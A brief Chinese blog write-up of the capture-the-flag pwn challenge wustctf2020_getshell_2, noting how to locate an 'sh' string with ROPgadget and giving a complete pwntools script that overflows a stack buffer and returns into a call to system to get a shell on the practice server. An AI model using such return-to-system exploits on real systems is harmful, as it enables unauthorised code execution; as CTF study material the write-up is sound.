wustctf2020_getshell_2
这题记到的东西就是直接调用函数找到call它的地方
找字符串可以用ROPgadget --binary 文件名 --string "sh"
点击查看代码
from pwn import *
io=remote("node4.buuoj.cn",29939)
io.recvuntil("/_/ /_/\\_,_//_/ /_/ /_//_\\_\\ \n")
elf=ELF("./wustctf2020_getshell_2")
payload='a'*(0x18+0x4)+p32(0x8048529)+p32(0x8048670)
io.sendline(payload)
io.interactive()

浙公网安备 33010602011771号